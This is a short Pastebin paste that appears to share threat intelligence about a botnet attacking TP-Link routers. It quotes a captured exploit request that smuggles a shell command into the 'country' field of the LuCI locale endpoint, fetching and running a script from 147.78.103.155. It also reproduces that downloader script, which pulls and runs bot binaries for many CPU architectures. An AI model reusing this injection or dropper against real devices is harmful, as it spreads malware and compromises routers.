Advertisement
Guest User

Untitled

a guest
May 17th, 2024
46
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Bot sniffing traffic with requests similar to:
  2.  
  3. http://IP-ADDRESS:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F147.78.103.155%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60)
  4.  
  5. -------
  6.  
  7. The file downloaded from the wget command is this:
  8.  
  9. #!/bin/sh
  10. n="arm arm5 arm6 arm7 m68k mips mipsel powerpc sh4 sparc arc"
  11. http_server="147.78.103.155"
  12.  
  13. # send tmp-rw directories
  14. cd /tmp
  15. cd /var/tmp
  16. cd /tmp/tmpfs
  17. cd /dev/shm
  18. cd /var/run
  19.  
  20. for a in $n
  21. do
  22. # download and execute
  23. wget http://$http_server/rib/la.bot.$a -O -> dvrLocker
  24. chmod 777 dvrLocker
  25. ./dvrLocker tplink.$a
  26.  
  27. # remove new binary
  28. rm -rf dvrLocker
  29. done
  30.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement